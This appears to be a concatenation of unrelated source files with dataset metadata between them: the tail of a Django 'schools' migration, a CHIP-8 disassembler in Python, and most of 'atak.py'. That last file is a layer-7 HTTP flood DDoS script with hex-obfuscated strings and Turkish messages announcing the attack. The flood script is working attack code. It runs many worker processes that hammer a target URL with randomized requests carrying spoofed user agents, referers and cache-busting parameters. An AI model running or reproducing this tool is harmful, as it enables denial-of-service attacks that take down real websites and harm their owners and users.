('short_name', models.CharField(max_length=100, help_text='Используется в урлах. Лучше обойтись латинскими буквами, цифрами и подчёркиванием. Например, cprime')),
('name', models.CharField(max_length=100, help_text="Например, C'")),
('school', models.ForeignKey(to='schools.School', on_delete=models.CASCADE)),
],
),
migrations.AlterField(
model_name='session',
name='short_name',
field=models.CharField(max_length=20, help_text='Используется в урлах. Лучше обойтись латинскими буквами, цифрами и подчёркиванием. Например, august'),
),
migrations.AddField(
model_name='parallel',
name='sessions',
field=models.ManyToManyField(to='schools.Session'),
),
migrations.AlterUniqueTogether(
name='parallel',
unique_together=set([('school', 'short_name')]),
),
]
| 37.078947
| 178
| 0.609652
|
eb81aadbfa75a952cb906b080db0d00248015c5f
| 4,317
|
py
|
Python
|
pychip/disassembler/disassembler.py
|
krskibin/pyChip8
|
517f4514fb49242acd8fb089c7de0ed62252d422
|
[
"MIT"
] | 3
|
2018-10-16T09:51:24.000Z
|
2020-08-02T14:33:35.000Z
|
pychip/disassembler/disassembler.py
|
krskibin/pyChip8
|
517f4514fb49242acd8fb089c7de0ed62252d422
|
[
"MIT"
] | null | null | null |
pychip/disassembler/disassembler.py
|
krskibin/pyChip8
|
517f4514fb49242acd8fb089c7de0ed62252d422
|
[
"MIT"
] | null | null | null |
from .opcode_table import OPCODE_TABLE
class Disassembler:
def __init__(self, memory):
self.memory: bytearray = memory
self.pc: int = 0x0
self.args_func_table: dict = {
0x0000: self.get_nnn_args,
0x00E0: self.get_no_args,
0x00EE: self.get_no_args,
0x1000: self.get_nnn_args,
0x2000: self.get_nnn_args,
0x3000: self.get_xkk_args,
0x4000: self.get_xya_args,
0x5000: self.get_xkk_args,
0x6000: self.get_xkk_args,
0x7000: self.get_xkk_args,
0x8000: self.get_xya_args,
0x8001: self.get_xya_args,
0x8002: self.get_xya_args,
0x8003: self.get_xya_args,
0x8004: self.get_xya_args,
0x8005: self.get_xya_args,
0x8006: self.get_xya_args,
0x8007: self.get_xya_args,
0x800E: self.get_xya_args,
0x9000: self.get_xya_args,
0xA000: self.get_i3n_args,
0xB000: self.get_nnn_args,
0xC000: self.get_xkk_args,
0xD000: self.get_xyn_args,
0xE09E: self.get_xaa_args,
0xE0A1: self.get_xaa_args,
0xF007: self.get_xa1_args,
0xF00A: self.get_xa2_args,
0xF015: self.get_xa3_args,
0xF018: self.get_xa4_args,
0xF01E: self.get_xa5_args,
0xF029: self.get_xa6_args,
0xF033: self.get_xa7_args,
0xF055: self.get_xa8_args,
0xF065: self.get_xa9_args
}
def get_opcode(self) -> int:
return self.memory[self.pc] << 8 | self.memory[self.pc + 1]
@staticmethod
def mask_opcode(opcode: int) -> int:
if (opcode & 0xF000) in [0x0000, 0xE000, 0xF000]:
opcode &= 0xF0FF
elif (opcode & 0xF000) in [0x8000]:
opcode &= 0xF00F
else:
opcode &= 0xF000
return opcode
@staticmethod
def lookup_opcode(opcode) -> str:
return OPCODE_TABLE.get(opcode, "????")
def find_args(self, opcode):
masked_opcode = Disassembler.mask_opcode(opcode)
return self.args_func_table.get(masked_opcode, self.__unhandled)(opcode)
def disassembly(self):
opcode = self.get_opcode()
args = self.find_args(opcode)
lookup_opcode = Disassembler.lookup_opcode(Disassembler.mask_opcode(opcode))
print(f'{hex(self.pc)}: {hex(opcode)[2:]}\t{lookup_opcode}\t{args}')
def __unhandled(self, *args):
return '????'
def get_nnn_args(self, opcode):
nnn = hex(opcode & 0xFFF)[2:]
return f' \t{nnn}'
def get_no_args(self, *args):
return ''
def get_xkk_args(self, opcode):
x = opcode >> 8 & 0x0f
kk = opcode & 0x00ff
return f'V{x:x}\t{hex(kk)}'
def get_xya_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
y = hex(opcode & 0x00f0)[2]
return f'V{x}, V{y}'
def get_i3n_args(self, opcode):
nnn = hex(opcode & 0xfff)[2:]
return f'I,\t{nnn}'
def get_xaa_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}'
def get_xyn_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
y = hex(opcode & 0x00f0)[2]
n = opcode & 0x000f
return f'V{x}, V{y} {n:x}'
def get_xa1_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}, DT'
def get_xa2_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}, K'
def get_xa3_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'DT, V{x}'
def get_xa4_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'ST, V{x}'
def get_xa5_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'I, V{x}'
def get_xa6_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'F, V{x}'
def get_xa7_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'B, V{x}'
def get_xa8_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'[I], V{x}'
def get_xa9_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}, [I]'
def get_unh_args(self, *args):
return f'unhandled'
| 29.772414
| 84
| 0.560111
|
96fb82e8f8a5019f93643d2bbc8a45fef61cd199
| 21,869
|
py
|
Python
|
atak.py
|
F-Society-Freaks/atak-layer7
|
96d087e8bf75271fe2a9faae60d23ed9938c9c4f
|
[
"MIT"
] | 1
|
2020-07-12T12:57:10.000Z
|
2020-07-12T12:57:10.000Z
|
atak.py
|
AtakBey/atak-layer7
|
96d087e8bf75271fe2a9faae60d23ed9938c9c4f
|
[
"MIT"
] | null | null | null |
atak.py
|
AtakBey/atak-layer7
|
96d087e8bf75271fe2a9faae60d23ed9938c9c4f
|
[
"MIT"
] | 2
|
2020-07-08T20:23:18.000Z
|
2020-07-12T12:57:12.000Z
|
#!/usr/bin/env python
from multiprocessing import Process, Manager
import urlparse, ssl
import sys, getopt, random, time
if sys.version_info < (3,0):
import httplib
HTTPCLIENT = httplib
else:
import http.client
HTTPCLIENT = http.client
DEBUG = True
METHOD_GET = "\x67\x65\x74"
METHOD_POST = "\x70\x6F\x73\x74"
METHOD_RAND = "\x72\x61\x6E\x64\x6F\x6D"
JOIN_TIMEOUT=1.5
DEFAULT_WORKERS=55
DEFAULT_SOCKETS=35
class R00T(object):
counter = [0, 0]
last_counter = [0, 0]
workersQueue = []
manager = None
url = None
nr_workers = DEFAULT_WORKERS
nr_sockets = DEFAULT_SOCKETS
method = METHOD_RAND
def __init__(self, url):
self.url = url
self.manager = Manager()
self.counter = self.manager.list((0, 0))
def exit(self):
self.stats()
print "DOWN!!!"
def __del__(self):
self.exit()
def printHeader(self):
print "DDoS SaLdirisi BasLatiLdi.."
print "CoDeD By Atakbey"
def fire(self):
self.printHeader()
print "\x4D\x65\x74\x68\x6F\x64\x3A\x20\x7B0\x7D\x20\x2F\x20\x53\x61\x79\x69\x73\x69\x3A\x20\x7B\x31\x7D\x20\x2F\x20\x53\x6F\x63\x6B\x65\x64\x3A\x20\x7B\x32\x7D\x20".format(self.method, self.nr_workers, self.nr_sockets)
if DEBUG:
print "\x44\x65\x62\x75\x67\x20\x4D\x6F\x64\x65\x73\x20\x4F\x4E\x20\x4D\x65\x74\x68\x6F\x64\x3A\x20\x7B0\x7D\x20".format(self.nr_workers)
for i in range(int(self.nr_workers)):
try:
worker = Laser(self.url, self.nr_sockets, self.counter)
worker.method = self.method
self.workersQueue.append(worker)
worker.start()
except (Exception):
error("\x53\x61\x79\x69\x20\x42\x61\x73\x6C\x61\x74\x69\x6C\x61\x6D\x61\x64\x69\x20\x7B0\x7D".format(i))
pass
print "\x4D\x6F\x6E\x69\x74\x6F\x72\x20\x62\x61\x73\x6C\x61\x74\x69\x6C\x69\x79\x6F\x72"
self.monitor()
def stats(self):
try:
if self.counter[0] > 0 or self.counter[1] > 0:
print "\x59\x65\x64\x69\x67\x69\x20\x50\x61\x6B\x65\x74\x73\x3A\x20\x7B0\x7D\x20\x44\x44\x6F\x53\x65\x44\x20\x28\x7B\x31\x7D\x20\x47\x47\x29".format(self.counter[0], self.counter[1])
if self.counter[0] > 0 and self.counter[1] > 0 and self.last_counter[0] == self.counter[0] and self.counter[1] > self.last_counter[1]:
print "Server may be DOWN! By atak.pl"
self.last_counter[0] = self.counter[0]
self.last_counter[1] = self.counter[1]
except (Exception):
pass
def monitor(self):
while len(self.workersQueue) > 0:
try:
for worker in self.workersQueue:
if worker is not None and worker.is_alive():
worker.join(JOIN_TIMEOUT)
else:
self.workersQueue.remove(worker)
self.stats()
except (KeyboardInterrupt, SystemExit):
print "\x43\x54\x52\x4C\x2B\x43\x20\x72\x65\x63\x65\x69\x76\x65\x64\x2E\x20\x4B\x69\x6C\x6C\x69\x6E\x67\x20\x61\x6C\x6C\x20\x77\x6F\x72\x6B\x65\x72\x73"
for worker in self.workersQueue:
try:
if DEBUG:
print "\x4B\x69\x6C\x6C\x69\x6E\x67\x20\x77\x6F\x72\x6B\x65\x72\x20\x7B0\x7D".format(worker.name)
worker.stop()
except Exception, ex:
pass
if DEBUG:
raise
else:
pass
class Laser(Process):
request_count = 0
failed_count = 0
url = None
host = None
port = 80
ssl = False
referers = []
useragents = []
socks = []
counter = None
nr_socks = DEFAULT_SOCKETS
runnable = True
method = METHOD_GET
def __init__(self, url, nr_sockets, counter):
super(Laser, self).__init__()
self.counter = counter
self.nr_socks = nr_sockets
parsedUrl = urlparse.urlparse(url)
if parsedUrl.scheme == "\x68\x74\x74\x70\x73":
self.ssl = True
self.host = parsedUrl.netloc.split("\x3A")[0]
self.url = parsedUrl.path
self.port = parsedUrl.port
if not self.port:
self.port = 80 if not self.ssl else 443
self.referers = [
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x75\x73\x61\x74\x6F\x64\x61\x79\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x2F\x72\x65\x73\x75\x6C\x74\x73\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x65\x6E\x67\x61\x64\x67\x65\x74\x2E\x73\x65\x61\x72\x63\x68\x2E\x61\x6F\x6C\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x76\x6B\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x66\x69\x6C\x65\x2E\x70\x68\x70\x3F\x72\x65\x64\x69\x72\x65\x63\x74\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x79\x61\x6E\x64\x65\x78\x2E\x72\x75\x2F\x79\x61\x6E\x64\x73\x65\x61\x72\x63\x68\x3F\x74\x65\x78\x74\x3D",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x75\x63\x6B\x64\x75\x63\x6B\x67\x6F\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x62\x69\x6E\x67\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x68\x65\x6C\x70\x2E\x62\x61\x69\x64\x75\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x52\x65\x73\x75\x6C\x74\x3F\x6B\x65\x79\x77\x6F\x72\x64\x73\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x73\x6B\x2E\x63\x6F\x6D\x2F\x77\x65\x62\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x65\x64\x64\x69\x74\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2E\x74\x72\x2F\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F" + self.host + "\x2F"
]
self.useragents = [
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x58\x31\x31\x3B\x20\x55\x3B\x20\x4C\x69\x6E\x75\x78\x20\x78\x38\x36\x5F\x36\x34\x3B\x20\x65\x6E\x2D\x55\x53\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x33\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x39\x31\x33\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x33",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x31\x3B\x20\x65\x6E\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x33\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x38\x32\x34\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x33\x20\x28\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x35\x2E\x33\x30\x37\x32\x39\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x65\x6E\x2D\x55\x53\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x33\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x38\x32\x34\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x33\x20\x28\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x35\x2E\x33\x30\x37\x32\x39\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x31\x3B\x20\x65\x6E\x2D\x55\x53\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x31\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x37\x31\x38\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x31",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x65\x6E\x2D\x55\x53\x29\x20\x41\x70\x70\x6C\x65\x57\x65\x62\x4B\x69\x74\x2F\x35\x33\x32\x2E\x31\x20\x28\x4B\x48\x54\x4D\x4C\x2C\x20\x6C\x69\x6B\x65\x20\x47\x65\x63\x6B\x6F\x29\x20\x43\x68\x72\x6F\x6D\x65\x2F\x34\x2E\x30\x2E\x32\x31\x39\x2E\x36\x20\x53\x61\x66\x61\x72\x69\x2F\x35\x33\x32\x2E\x31",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x31\x3B\x20\x57\x4F\x57\x36\x34\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x3B\x20\x53\x4C\x43\x43\x32\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x32\x2E\x30\x2E\x35\x30\x37\x32\x37\x3B\x20\x49\x6E\x66\x6F\x50\x61\x74\x68\x2E\x32\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x3B\x20\x53\x4C\x43\x43\x31\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x32\x2E\x30\x2E\x35\x30\x37\x32\x37\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x31\x2E\x31\x2E\x34\x33\x32\x32\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x35\x2E\x33\x30\x37\x32\x39\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x30\x2E\x33\x30\x37\x32\x39\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x57\x69\x6E\x36\x34\x3B\x20\x78\x36\x34\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x3B\x20\x53\x56\x31\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x32\x2E\x30\x2E\x35\x30\x37\x32\x37\x3B\x20\x49\x6E\x66\x6F\x50\x61\x74\x68\x2E\x32\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x4D\x53\x49\x45\x20\x37\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x3B\x20\x65\x6E\x2D\x55\x53\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x36\x2E\x31\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x58\x50\x29",
"\x4F\x70\x65\x72\x61\x2F\x39\x2E\x38\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x55\x3B\x20\x72\x75\x29\x20\x50\x72\x65\x73\x74\x6F\x2F\x32\x2E\x35\x2E\x32\x32\x20\x56\x65\x72\x73\x69\x6F\x6E\x2F\x31\x30\x2E\x35\x31",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x70\x6C\x3B\x20\x72\x76\x3A\x31\x2E\x38\x2E\x30\x2E\x31\x29",
"\x4A\x61\x76\x61\x2F\x31\x2E\x34\x2E\x31\x5F\x30\x34",
"\x4F\x70\x65\x72\x61\x2F\x38\x2E\x35\x31\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x55\x3B\x20\x65\x6E\x3B\x56\x57\x50\x2D\x6F\x6E\x6C\x69\x6E\x65\x2E\x64\x65\x29",
"\x57\x67\x65\x74\x2F\x31\x2E\x39\x2E\x31",
"\x41\x70\x70\x45\x6E\x67\x69\x6E\x65\x2D\x47\x6F\x6F\x67\x6C\x65\x3B\x20\x28\x2B\x68\x74\x74\x70\x3A\x2F\x2F\x63\x6F\x64\x65\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x61\x70\x70\x65\x6E\x67\x69\x6E\x65\x3B\x20\x61\x70\x70\x69\x64\x3A\x20\x77\x65\x62\x65\x74\x72\x65\x78\x29",
"\x42\x6C\x61\x63\x6B\x42\x65\x72\x72\x79\x38\x33\x30\x30\x2F\x34\x2E\x32\x2E\x32\x20\x50\x72\x6F\x66\x69\x6C\x65\x2F\x4D\x49\x44\x50\x2D\x32\x2E\x30\x20\x43\x6F\x6E\x66\x69\x67\x75\x72\x61\x74\x69\x6F\x6E\x2F\x43\x4C\x44\x43\x2D\x31\x2E\x31\x20\x56\x65\x6E\x64\x6F\x72\x49\x44\x2F\x31\x30\x37\x20\x55\x50\x2E\x4C\x69\x6E\x6B\x2F\x36\x2E\x32\x2E\x33\x2E\x31\x35\x2E\x30",
"\x4C\x79\x6E\x78\x2F\x32\x2E\x38\x2E\x36\x72\x65\x6C\x2E\x34\x20\x6C\x69\x62\x77\x77\x77\x2D\x46\x4D\x2F\x32\x2E\x31\x34\x20\x53\x53\x4C\x2D\x4D\x4D\x2F\x31\x2E\x34\x2E\x31\x20\x4F\x70\x65\x6E\x53\x53\x4C\x2F\x30\x2E\x39\x2E\x38\x67",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x36\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x43\x45\x3B\x20\x49\x45\x4D\x6F\x62\x69\x6C\x65\x20\x36\x2E\x35\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x31\x30\x2E\x30\x3B\x20\x57\x69\x6E\x36\x34\x3B\x20\x78\x36\x34\x29\x20\x41\x70\x70\x6C\x65\x57\x65\x62\x4B\x69\x74\x2F\x35\x33\x37\x2E\x33\x36\x20\x28\x4B\x48\x54\x4D\x4C\x2C\x20\x6C\x69\x6B\x65\x20\x47\x65\x63\x6B\x6F\x29\x20\x43\x68\x72\x6F\x6D\x65\x2F\x37\x33\x2E\x30\x2E\x33\x36\x38\x33\x2E\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2F\x35\x33\x37\x2E\x33\x36\x20\x4F\x50\x52\x2F\x36\x30\x2E\x30\x2E\x33\x32\x35\x35\x2E\x36\x39",
"\x4F\x70\x65\x72\x61\x2F\x39\x2E\x38\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x55\x3B\x20\x72\x75\x29\x20\x50\x72\x65\x73\x74\x6F\x2F\x32\x2E\x35\x2E\x32\x32\x20\x56\x65\x72\x73\x69\x6F\x6E\x2F\x33\x31\x2E\x35\x31",
"\x4C\x79\x6E\x78\x2F\x32\x2E\x38\x2E\x38\x64\x65\x76\x2E\x31\x32\x20\x6C\x69\x62\x77\x77\x77\x2D\x46\x4D\x2F\x32\x2E\x31\x34\x20\x53\x53\x4C\x2D\x4D\x4D\x2F\x31\x2E\x34\x2E\x31\x20\x47\x4E\x55\x54\x4C\x53\x2F\x32\x2E\x31\x32\x2E\x31\x34",
]
def __del__(self):
self.stop()
def buildblock(self, size):
out_str = ""
_LOWERCASE = range(97, 122)
_UPPERCASE = range(65, 90)
_NUMERIC = range(48, 57)
validChars = _LOWERCASE + _UPPERCASE + _NUMERIC
for i in range(0, size):
a = random.choice(validChars)
out_str += chr(a)
return out_str
def run(self):
if DEBUG:
print "\x53\x6F\x63\x6B\x65\x74\x73\x20\x4C\x65\x72\x20\x41\x63\x69\x6C\x69\x79\x6F\x72\x2E\x2E\x2E".format(self.name)
while self.runnable:
try:
for i in range(self.nr_socks):
if self.ssl:
c = HTTPCLIENT.HTTPSConnection(self.host, self.port)
else:
c = HTTPCLIENT.HTTPConnection(self.host, self.port)
self.socks.append(c)
for conn_req in self.socks:
(url, headers) = self.createPayload()
method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method
conn_req.request(method.upper(), url, None, headers)
for conn_resp in self.socks:
resp = conn_resp.getresponse()
self.incCounter()
self.closeConnections()
except:
self.incFailed()
if DEBUG:
raise
else:
pass
if DEBUG:
print "\x57\x6F\x72\x6B\x65\x72\x20\x7B0\x7D\x20\x63\x6F\x6D\x70\x6C\x65\x74\x65\x64\x20\x72\x75\x6E\x2E\x20\x53\x6C\x65\x65\x70\x69\x6E\x67\x2E\x2E\x2E".format(self.name)
def closeConnections(self):
for conn in self.socks:
try:
conn.close()
except:
pass
def createPayload(self):
req_url, headers = self.generateData()
random_keys = headers.keys()
random.shuffle(random_keys)
random_headers = {}
for header_name in random_keys:
random_headers[header_name] = headers[header_name]
return (req_url, random_headers)
def generateQueryString(self, ammount = 1):
queryString = []
for i in range(ammount):
key = self.buildblock(random.randint(3,10))
value = self.buildblock(random.randint(3,20))
element = "\x7B0\x7D\x3D\x7B\x31\x7D".format(key, value)
queryString.append(element)
return "\x26".join(queryString)
def generateData(self):
returnCode = 0
param_joiner = "\x3F"
if len(self.url) == 0:
self.url = "\x2F"
if self.url.count("\x3F") > 0:
param_joiner = "\x26"
request_url = self.generateRequestUrl(param_joiner)
http_headers = self.generateRandomHeaders()
return (request_url, http_headers)
def generateRequestUrl(self, param_joiner = "\x3F"):
return self.url + param_joiner + self.generateQueryString(random.randint(1,5))
def generateRandomHeaders(self):
noCacheDirectives = ["\x6E\x6F\x2D\x63\x61\x63\x68\x65", "\x6D\x75\x73\x74\x2D\x72\x65\x76\x61\x6C\x69\x64\x61\x74\x65"]
random.shuffle(noCacheDirectives)
noCache = "\x2C\x20".join(noCacheDirectives)
acceptEncoding = ["\x27\x27","\x2A","\x69\x64\x65\x6E\x74\x69\x74\x79","\x67\x7A\x69\x70","\x64\x65\x66\x6C\x61\x74\x65"]
random.shuffle(acceptEncoding)
nrEncodings = random.randint(0,len(acceptEncoding)/2)
roundEncodings = acceptEncoding[:nrEncodings]
http_headers = {
"\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74": random.choice(self.useragents),
"\x43\x61\x63\x68\x65\x2D\x43\x6F\x6E\x74\x72\x6F\x6C": noCache,
"\x41\x63\x63\x65\x70\x74\x2D\x45\x6E\x63\x6F\x64\x69\x6E\x67": "\x2C\x20".join(roundEncodings),
"\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E": "\x6B\x65\x65\x70\x2D\x61\x6C\x69\x76\x65",
"\x4B\x65\x65\x70\x2D\x41\x6C\x69\x76\x65": random.randint(110,120),
"\x48\x6F\x73\x74": self.host,
}
if random.randrange(2) == 0:
acceptCharset = [ "\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x31", "\x75\x74\x66\x2D\x38", "\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32\x35\x31", "\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x32", "\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x31\x35", ]
random.shuffle(acceptCharset)
http_headers["\x41\x63\x63\x65\x70\x74\x2D\x43\x68\x61\x72\x73\x65\x74"] = "\x7B\x30\x7D\x2C\x7B\x31\x7D\x3B\x71\x3D\x7B\x32\x7D\x2C\x2A\x3B\x71\x3D\x7B\x33\x7D".format(acceptCharset[0], acceptCharset[1],round(random.random(), 1), round(random.random(), 1))
if random.randrange(2) == 0:
http_headers["\x52\x65\x66\x65\x72\x65\x72"] = random.choice(self.referers) + self.buildblock(random.randint(5,10))
if random.randrange(2) == 0:
http_headers["\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65"] = random.choice(["\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x75\x72\x6C\x2D\x65\x6E\x63\x6F\x64\x65\x64"])
if random.randrange(2) == 0:
http_headers["\x43\x6F\x6F\x6B\x69\x65"] = self.generateQueryString(random.randint(1, 5))
return http_headers
def stop(self):
self.runnable = False
self.closeConnections()
self.terminate()
def incCounter(self):
try:
self.counter[0] += 1
except (Exception):
pass
def incFailed(self):
try:
self.counter[1] += 1
except (Exception):
pass
def usage():
print
print ""
print "Priv Layer7 Attack Script By Atakbey"
print
print ""
def error(msg):
sys.stderr.write(str(msg+"\n"))
usage()
sys.exit(2)
def main():
try:
if len(sys.argv) < 2:
error("Hedef Belirtiniz = python atak.py http://targetsite.com")
url = sys.argv[1]
if url == "\x2D\x68":
usage()
sys.exit()
if url[0:4].lower() != "\x68\x74\x74\x70":
error("\x48\x65\x64\x65\x66\x20\x55\x72\x6C\x64\x65\x20\x48\x61\x74\x61\x20\x56\x61\x72\x20\x2D\x20\x31")
if url == None:
error("\x48\x65\x64\x65\x66\x20\x55\x72\x6C\x64\x65\x20\x48\x61\x74\x61\x20\x56\x61\x72\x20\x2D\x20\x32")
